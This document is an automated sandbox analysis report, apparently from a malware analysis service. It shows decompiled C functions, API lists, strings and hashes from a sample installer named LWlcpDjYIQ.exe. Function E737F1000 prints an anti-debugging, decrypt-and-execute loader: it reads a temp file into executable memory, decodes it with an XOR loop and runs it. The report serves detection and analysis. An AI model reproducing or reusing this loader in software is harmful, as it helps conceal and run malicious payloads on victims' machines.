							_t51 = _v332.dwFileAttributes;
							__eflags = _t51 & 0x00000010;
							if((_t51 & 0x00000010) == 0) {
								SetFileAttributesA(_t74, _t51 & 0x000000fe);
								_t54 = DeleteFileA(_t74);
								__eflags = _t54;
								if(_t54 != 0) {
									E00404D7E(0xfffffff2, _t74);
								} else {
									__eflags = _a8 & 0x00000004;
									if((_a8 & 0x00000004) == 0) {
										 *0x42f4a8 =  *0x42f4a8 + 1;
									} else {
										E00404D7E(0xfffffff1, _t74);
										E00405723(_t74, 0);
									}
								}
							} else {
								__eflags = (_a8 & 0x00000003) - 3;
								if(__eflags == 0) {
									E0040531D(_t72, __eflags, _t74, _a8);
								}
							}
							goto L24;
						}
						_t63 =  *((intOrPtr*)(_t77 + 1));
						__eflags = _t63;
						if(_t63 == 0) {
							goto L24;
						}
						__eflags = _t63 - 0x2e;
						if(_t63 != 0x2e) {
							goto L16;
						}
						__eflags =  *((char*)(_t77 + 2));
						if( *((char*)(_t77 + 2)) == 0) {
							goto L24;
						}
						goto L16;
						L24:
						_t57 = FindNextFileA(_a4,  &_v332);
						__eflags = _t57;
					} while (_t57 != 0);
					_t37 = FindClose(_a4);
					goto L26;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L28:
						__eflags = _v8;
						if(_v8 == 0) {
							L36:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405CB0(_t74);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L36;
							}
							E004054E8(_t74);
							SetFileAttributesA(_t74, 0x80);
							_t37 = RemoveDirectoryA(_t74);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404D7E(0xffffffe5, _t74);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L30;
							}
							E00404D7E(0xfffffff1, _t74);
							return E00405723(_t74, 0);
						}
						L30:
						 *0x42f4a8 =  *0x42f4a8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                                          0x00405328
                                                                          0x0040532c
                                                                          0x00405335
                                                                          0x00405338
                                                                          0x0040533b
                                                                          0x00405343
                                                                          0x00405345
                                                                          0x00405346
                                                                          0x00000000
                                                                          0x00405346
                                                                          0x00405355
                                                                          0x00405355
                                                                          0x00405358
                                                                          0x0040535b
                                                                          0x0040536f
                                                                          0x00405376
                                                                          0x0040537b
                                                                          0x0040537d
                                                                          0x0040538d
                                                                          0x0040537f
                                                                          0x00405385
                                                                          0x00405385
                                                                          0x00405398
                                                                          0x004053ad
                                                                          0x004053af
                                                                          0x004053b5
                                                                          0x004053b8
                                                                          0x004053bb
                                                                          0x0040547d
                                                                          0x0040547d
                                                                          0x00405481
                                                                          0x00405483
                                                                          0x00405483
                                                                          0x00405483
                                                                          0x00405483
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004053c1
                                                                          0x004053c1
                                                                          0x004053ca
                                                                          0x004053d0
                                                                          0x004053d5
                                                                          0x004053d8
                                                                          0x004053da
                                                                          0x004053de
                                                                          0x004053e0
                                                                          0x004053e0
                                                                          0x004053de
                                                                          0x004053e3
                                                                          0x004053e6
                                                                          0x004053f9
                                                                          0x004053fb
                                                                          0x00405400
                                                                          0x00405406
                                                                          0x00405408
                                                                          0x00405423
                                                                          0x0040542a
                                                                          0x00405430
                                                                          0x00405432
                                                                          0x00405457
                                                                          0x00405434
                                                                          0x00405434
                                                                          0x00405438
                                                                          0x0040544c
                                                                          0x0040543a
                                                                          0x0040543d
                                                                          0x00405445
                                                                          0x00405445
                                                                          0x00405438
                                                                          0x0040540a
                                                                          0x00405410
                                                                          0x00405412
                                                                          0x00405418
                                                                          0x00405418
                                                                          0x00405412
                                                                          0x00000000
                                                                          0x00405408
                                                                          0x004053e8
                                                                          0x004053eb
                                                                          0x004053ed
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004053ef
                                                                          0x004053f1
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004053f3
                                                                          0x004053f7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040545c
                                                                          0x00405466
                                                                          0x0040546c
                                                                          0x0040546c
                                                                          0x00405477
                                                                          0x00000000
                                                                          0x0040535d
                                                                          0x0040535d
                                                                          0x0040535f
                                                                          0x00405487
                                                                          0x0040548a
                                                                          0x0040548d
                                                                          0x004054e5
                                                                          0x004054e5
                                                                          0x004054e5
                                                                          0x0040548f
                                                                          0x00405492
                                                                          0x0040549d
                                                                          0x004054a2
                                                                          0x004054a4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004054a7
                                                                          0x004054b2
                                                                          0x004054b9
                                                                          0x004054bf
                                                                          0x004054c1
                                                                          0x00000000
                                                                          0x004054dd
                                                                          0x004054c3
                                                                          0x004054c7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x004054cc
                                                                          0x00000000
                                                                          0x004054d3
                                                                          0x00405494
                                                                          0x00405494
                                                                          0x00000000
                                                                          0x00405494
                                                                          0x00405365
                                                                          0x00405369
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00405369

                                                                          APIs
                                                                          • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 0040533B
                                                                          • lstrcatA.KERNEL32(0042B8A8,\*.*,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 00405385
                                                                          • lstrcatA.KERNEL32(?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 00405398
                                                                          • lstrlenA.KERNEL32(?,?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 0040539E
                                                                          • FindFirstFileA.KERNEL32(0042B8A8,?,?,?,00409010,?,0042B8A8,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ,00000000), ref: 004053AF
                                                                          • FindNextFileA.KERNEL32(?,?,000000F2,?), ref: 00405466
                                                                          • FindClose.KERNEL32(?), ref: 00405477
                                                                          Strings
                                                                          • \*.*, xrefs: 0040537F
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405351
                                                                          • "C:\Users\user\Desktop\LWlcpDjYIQ.exe" , xrefs: 00405327
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\LWlcpDjYIQ.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-196925139
                                                                          • Opcode ID: 3522ceb3759a82111fcba68967208c99b7d02cfbf248ea4468f4fadd88b01e5f
                                                                          • Instruction ID: 3fe59752bbf574e46fae068060fc046f50c982b120df211f1784a4fc8f97d981
                                                                          • Opcode Fuzzy Hash: 3522ceb3759a82111fcba68967208c99b7d02cfbf248ea4468f4fadd88b01e5f
                                                                          • Instruction Fuzzy Hash: E651CE30404A54BACB216B618C85BFF3B78DF42755F14817BF941B61D2C77C4982DE6A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 737F1000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81filememorystringCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 78%
                                                                          			E737F1000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t29;
				void* _t31;
				long _t34;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\e68h9be2heenoc");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t31 = _t16;
					if(_t31 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t31, 0);
					_t34 = _t16;
					if(_t34 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t34, 0x3000, 0x40); // executed
					 *0x737f3000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t31, _t16, _t34,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t29 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x737f3000(); // executed
						goto L11;
					}
					asm("o16 nop [eax+eax]");
					do {
						asm("ror al, 0x3");
						 *( *0x737f3000 + _t29) =  !( ~( !(( *( *0x737f3000 + _t29) ^ _t29) - 0x0000006a ^ _t29) - 0x00000001 ^ _t29) ^ _t29);
						_t29 = _t29 + 1;
					} while (_t29 < _v8);
					goto L10;
				}
				return _t12;
			}










                                                                          0x737f1009
                                                                          0x737f1018
                                                                          0x737f101a
                                                                          0x737f101a
                                                                          0x737f102c
                                                                          0x737f1034
                                                                          0x737f1047
                                                                          0x737f1066
                                                                          0x737f106c
                                                                          0x737f1071
                                                                          0x737f10ee
                                                                          0x00000000
                                                                          0x737f10ee
                                                                          0x737f1077
                                                                          0x737f107d
                                                                          0x737f1082
                                                                          0x737f10ed
                                                                          0x00000000
                                                                          0x737f10ed
                                                                          0x737f108e
                                                                          0x737f1094
                                                                          0x737f109b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x737f10a6
                                                                          0x737f10ae
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x737f10b0
                                                                          0x737f10b5
                                                                          0x737f10e7
                                                                          0x737f10e7
                                                                          0x00000000
                                                                          0x737f10e7
                                                                          0x737f10b7
                                                                          0x737f10c0
                                                                          0x737f10d7
                                                                          0x737f10de
                                                                          0x737f10e1
                                                                          0x737f10e2
                                                                          0x00000000
                                                                          0x737f10c0
                                                                          0x737f10f2

                                                                          APIs
                                                                          • IsDebuggerPresent.KERNEL32 ref: 737F1010
                                                                          • DebugBreak.KERNEL32 ref: 737F101A
                                                                          • GetTempPathW.KERNEL32(00000103,?), ref: 737F102C
                                                                          • lstrcatW.KERNEL32(?,\e68h9be2heenoc), ref: 737F1047
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 737F1066
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 737F1077
                                                                          • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 737F108E
                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 737F10A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.220704641.00000000737F1000.00000020.00020000.sdmp, Offset: 737F0000, based on PE: true
                                                                          • Associated: 00000000.00000002.220700965.00000000737F0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.220709086.00000000737F2000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.220714494.00000000737F4000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
                                                                          • String ID: \e68h9be2heenoc
                                                                          • API String ID: 4020703165-3354485743
                                                                          • Opcode ID: df9914417f007d61681a03fd5cb4c5a135534c9670ad2e842ac039afb9eb15b5
                                                                          • Instruction ID: 6d773da0309e75af208fd3b2d8f379de2f07e318cc10a6354f72b670a40eb223
                                                                          • Opcode Fuzzy Hash: df9914417f007d61681a03fd5cb4c5a135534c9670ad2e842ac039afb9eb15b5
                                                                          • Instruction Fuzzy Hash: EC21D33A60020FABE720ABA38D09FAA3B78FB05740F208254E51AE71C0DB785507D725
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401FDC, Relevance: 9.1, APIs: 6, Instructions: 72libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00401FDC(int __ebx) {
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t27;
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001); // executed
				if( *0x42f4d0 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A9A(0xfffffff0);
					 *(_t37 + 8) = E00402A9A(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t20 = LoadLibraryA(_t35); // executed
						_t33 = _t20;
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401428();
						} else {
							goto L4;
						}
					} else {
						_t27 = GetModuleHandleA(_t35); // executed
						_t33 = _t27;
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404D7E(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x430000, 0x40b040, 0x409000); // executed
								} else {
									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x42f4a8 =  *0x42f4a8 +  *(_t37 - 4);
				return 0;
			}










                                                                          0x00401fdc
                                                                          0x00401fe4
                                                                          0x00401fe7
                                                                          0x00401ff3
                                                                          0x00402093
                                                                          0x00000000
                                                                          0x00401ff9
                                                                          0x00402001
                                                                          0x0040200b
                                                                          0x0040200e
                                                                          0x0040201d
                                                                          0x0040201e
                                                                          0x00402024
                                                                          0x00402028
                                                                          0x0040208f
                                                                          0x00402095
                                                                          0x00402095
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402010
                                                                          0x00402011
                                                                          0x00402017
                                                                          0x0040201b
                                                                          0x0040202a
                                                                          0x00402034
                                                                          0x00402038
                                                                          0x0040207c
                                                                          0x0040203a
                                                                          0x0040203d
                                                                          0x00402040
                                                                          0x00402070
                                                                          0x00402042
                                                                          0x00402045
                                                                          0x0040204e
                                                                          0x00402050
                                                                          0x00402050
                                                                          0x0040204e
                                                                          0x00402040
                                                                          0x00402084
                                                                          0x00402087
                                                                          0x00402087
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0040201b
                                                                          0x0040200e
                                                                          0x0040209b
                                                                          0x00402932
                                                                          0x0040293e

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000,?), ref: 00404DB7
                                                                            • Part of subcall function 00404D7E: lstrlenA.KERNEL32(00403018,0042A080,00000000,0041A058,74B5EA30,?,?,?,?,?,?,?,?,?,00403018,00000000), ref: 00404DC7
                                                                            • Part of subcall function 00404D7E: lstrcatA.KERNEL32(0042A080,00403018,00403018,0042A080,00000000,0041A058,74B5EA30), ref: 00404DDA
                                                                            • Part of subcall function 00404D7E: SetWindowTextA.USER32(0042A080,0042A080), ref: 00404DEC
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E12
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E2C
                                                                            • Part of subcall function 00404D7E: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E3A
                                                                          • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                          • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                          • SetErrorMode.KERNEL32 ref: 0040209B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 1609199483-0
                                                                          • Opcode ID: 4abed337f43c9168ffad4b573985f780fbeb4aea72ba3c33bd1809f5dbb1ef61
                                                                          • Instruction ID: c5381c54e09c994885a3158ba55f540892437f2dc07422c62f15d33d11318b3a
                                                                          • Opcode Fuzzy Hash: 4abed337f43c9168ffad4b573985f780fbeb4aea72ba3c33bd1809f5dbb1ef61
                                                                          • Instruction Fuzzy Hash: 69210B31D04321EBCB216FA59E4CA5E7670AF54315B20023BF712B22E1D7BC4982DA9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405CB0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24fileCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00405CB0(CHAR* _a4) {
				void* _t3;
				void* _t8;

				SetErrorMode(0x8001); // executed
				_t3 = FindFirstFileA(_a4, 0x42c8f0); // executed
				_t8 = _t3; // executed
				SetErrorMode(0); // executed
				if(_t8 == 0xffffffff) {
					return 0;
				}
				FindClose(_t8); // executed
				return 0x42c8f0;
			}





                                                                          0x00405cbe
                                                                          0x00405cca
                                                                          0x00405cd2
                                                                          0x00405cd4
                                                                          0x00405cd9
                                                                          0x00000000
                                                                          0x00405ce6
                                                                          0x00405cdc
                                                                          0x00000000

                                                                          APIs
                                                                          • SetErrorMode.KERNELBASE(00008001,00000000,0042BCA8,C:\Users\user\AppData\Local\Temp\,0040560B,0042BCA8,0042BCA8,00000000,0042BCA8,0042BCA8,?,?,00000000,00405331,?,"C:\Users\user\Desktop\LWlcpDjYIQ.exe" ), ref: 00405CBE
                                                                          • FindFirstFileA.KERNELBASE(?,0042C8F0), ref: 00405CCA
                                                                          • SetErrorMode.KERNELBASE(00000000), ref: 00405CD4
                                                                          • FindClose.KERNELBASE(00000000), ref: 00405CDC
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CB0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.219846676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.219835610.0000000000400000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219861087.0000000000407000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219866732.0000000000409000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219873304.0000000000414000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219881811.0000000000420000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219886433.000000000042C000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219891493.0000000000435000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.219897158.0000000000438000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: ErrorFindMode$CloseFileFirst
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                          • API String ID: 2885216544-3916508600
                                                                          • Opcode ID: 4bcafefa4e130ec5ad77df29b00d99c8f1cd56117c23fcf05118be8afef71f8e
                                                                          • Instruction ID: 4661ff598cab52d61aefab85f16d743ffe836d29aedf95ad22b7aca8ae85483a
                                                                          • Opcode Fuzzy Hash: 4bcafefa4e130ec5ad77df29b00d99c8f1cd56117c23fcf05118be8afef71f8e
                                                                          • Instruction Fuzzy Hash: 27E0CD32B087605BD20017B46D88D0B365CEBD5721F104133F600F62D0C6B55C014BF9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402C37, Relevance: 35.2, APIs: 10, Strings: 10, Instructions: 195memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E00402C37(void* __eflags, signed int _a4) {
				struct HWND__* _v8;
				char _v12;
				long _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				long _t52;
				long _t56;
				void* _t58;
				void* _t62;
				intOrPtr* _t66;
				long _t67;
				long _t78;
				void* _t79;
				intOrPtr _t89;
				void* _t91;
				long _t92;
				void* _t93;
				signed int _t94;
				signed int _t95;
				void* _t97;
				long _t101;
				void* _t102;

				_v8 = 0;
				_t52 = GetTickCount();
				_v16 = 0;
				_v12 = 0;
				_t100 = "C:\\Users\\hardz\\Desktop";
				_t97 = _t52 + 0x3e8;
				GetModuleFileNameA( *0x42f420, "C:\\Users\\hardz\\Desktop", 0x400);
				_t91 = E004056AC(_t100, 0x80000000, 3);
				_v20 = _t91;
				 *0x409020 = _t91;
				if(_t91 == 0xffffffff) {
					return "Error launching installer";
				}
				E0040552F(_t100);
				_t56 = GetFileSize(_t91, 0);
				 *0x428c58 = _t56;
				_t101 = _t56;
				if(_t56 <= 0) {
					L27:
					if( *0x42f42c == 0) {
						goto L33;
					}
					if(_v12 == 0) {
						L31:
						_t58 = GlobalAlloc(0x40, _v28); // executed
						_t102 = _t58;
						E0040311B( *0x42f42c + 0x1c);
						_push(_v28);
						_push(_t102);
						_push(0);
						_push(0xffffffff); // executed
						_t62 = E00402EBD(); // executed
						if(_t62 == _v28) {
							 *0x42f428 = _t102;
							if((_a4 & 0x00000002) != 0) {
								 *_t102 =  *_t102 | 0x00000008;
							}
							 *0x42f4c0 =  *_t102 & 0x00000018;
							 *0x42f430 =  *_t102;
							if((_v48 & 0x00000001) != 0) {
								 *0x42f434 =  *0x42f434 + 1;
							}
							_t49 = _t102 + 0x44; // 0x44
							_t66 = _t49;
							_t93 = 8;
							do {
								_t66 = _t66 - 8;
								 *_t66 =  *_t66 + _t102;
								_t93 = _t93 - 1;
							} while (_t93 != 0);
							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
							 *(_t102 + 0x3c) = _t67;
							E0040568C(0x42f440, _t102 + 4, 0x40);
							return 0;
						}
						GlobalFree(_t102);
						goto L33;
					}
					E0040311B( *0x414c50);
					if(E004030E9( &_v12, 4) == 0 || _v16 != _v12) {
						goto L33;
					} else {
						goto L31;
					}
				} else {
					do {
						_t92 = _t101;
						asm("sbb eax, eax");
						_t78 = ( ~( *0x42f42c) & 0x00007e00) + 0x200;
						if(_t101 >= _t78) {
							_t92 = _t78;
						}
						_t79 = E004030E9(0x420c58, _t92); // executed
						if(_t79 == 0) {
							if(_v8 != 0) {
								DestroyWindow(_v8);
							}
							L33:
							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
						}
						if( *0x42f42c != 0) {
							if((_a4 & 0x00000002) == 0) {
								if(_v8 == 0) {
									if(GetTickCount() > _t97) {
										_v8 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
									}
								} else {
									E00405D18(0);
								}
							}
							goto L22;
						}
						E0040568C( &_v48, 0x420c58, 0x1c);
						_t94 = _v48;
						if((_t94 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
							_t89 = _v24;
							if(_t89 > _t101) {
								goto L33;
							}
							_a4 = _a4 | _t94;
							_t95 =  *0x414c50; // 0x7c00
							 *0x42f42c = _t95;
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t24 = _t89 - 4; // 0x1c
								_t101 = _t24;
								if(_t92 > _t101) {
									_t92 = _t101;
								}
								goto L22;
							} else {
								break;
							}
						}
						L22:
						if(_t101 <  *0x428c58) {
							_v16 = E00405D4B(_v16, 0x420c58, _t92);
						}
						 *0x414c50 =  *0x414c50 + _t92;
						_t101 = _t101 - _t92;
					} while (_t101 > 0);
					if(_v8 != 0) {
						DestroyWindow(_v8);
					}
					goto L27;
				}
			}































                                                                          0x00402c42
                                                                          0x00402c45
                                                                          0x00402c4b
                                                                          0x00402c4e
                                                                          0x00402c51
                                                                          0x00402c64
                                                                          0x00402c6a
                                                                          0x00402c7d
                                                                          0x00402c82
                                                                          0x00402c85
                                                                          0x00402c8b
                                                                          0x00000000
                                                                          0x00402c8d
                                                                          0x00402c98
                                                                          0x00402ca0
                                                                          0x00402ca8
                                                                          0x00402cad
                                                                          0x00402caf
                                                                          0x00402dde
                                                                          0x00402de6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402deb
                                                                          0x00402e0f
                                                                          0x00402e14
                                                                          0x00402e1a
                                                                          0x00402e25
                                                                          0x00402e2a
                                                                          0x00402e2d
                                                                          0x00402e2e
                                                                          0x00402e2f
                                                                          0x00402e31
                                                                          0x00402e39
                                                                          0x00402e5e
                                                                          0x00402e64
                                                                          0x00402e66
                                                                          0x00402e66
                                                                          0x00402e72
                                                                          0x00402e79
                                                                          0x00402e7e
                                                                          0x00402e80
                                                                          0x00402e80
                                                                          0x00402e88
                                                                          0x00402e88
                                                                          0x00402e8b
                                                                          0x00402e8c
                                                                          0x00402e8c
                                                                          0x00402e8f
                                                                          0x00402e91
                                                                          0x00402e91
                                                                          0x00402e9b
                                                                          0x00402ea1
                                                                          0x00402eaf
                                                                          0x00000000
                                                                          0x00402eb4
                                                                          0x00402e3c
                                                                          0x00000000
                                                                          0x00402e3c
                                                                          0x00402df3
                                                                          0x00402e05
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402cb5
                                                                          0x00402cb5
                                                                          0x00402cba
                                                                          0x00402cbe
                                                                          0x00402cc5
                                                                          0x00402ccc
                                                                          0x00402cce
                                                                          0x00402cce
                                                                          0x00402cd6
                                                                          0x00402cdd
                                                                          0x00402e4d
                                                                          0x00402e52
                                                                          0x00402e52
                                                                          0x00402e42
                                                                          0x00000000
                                                                          0x00402e42
                                                                          0x00402ceb
                                                                          0x00402d70
                                                                          0x00402d75
                                                                          0x00402d87
                                                                          0x00402da3
                                                                          0x00402da3
                                                                          0x00402d77
                                                                          0x00402d78
                                                                          0x00402d78
                                                                          0x00402d75
                                                                          0x00000000
                                                                          0x00402d70
                                                                          0x00402cf8
                                                                          0x00402cfd
                                                                          0x00402d06
                                                                          0x00402d38
                                                                          0x00402d3d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d43
                                                                          0x00402d46
                                                                          0x00402d50
                                                                          0x00402d56
                                                                          0x00402d5e
                                                                          0x00402d61
                                                                          0x00402d61
                                                                          0x00402d66
                                                                          0x00402d68
                                                                          0x00402d68
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00402d56
                                                                          0x00402da6
                                                                          0x00402dac
                                                                          0x00402dbc
                                                                          0x00402dbc
                                                                          0x00402dbf
                                                                          0x00402dc5
                                                                          0x00402dc7
                                                                          0x00402dd3
                                                                          0x00402dd8
                                                                          0x00402dd8
                                                                          0x00000000
                                                                          0x00402dd3

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402C45
                                                                          • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 00402C6A
                                                                            • Part of subcall function 004056AC: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032CB,00000000,00000000,00000020), ref: 004056B0
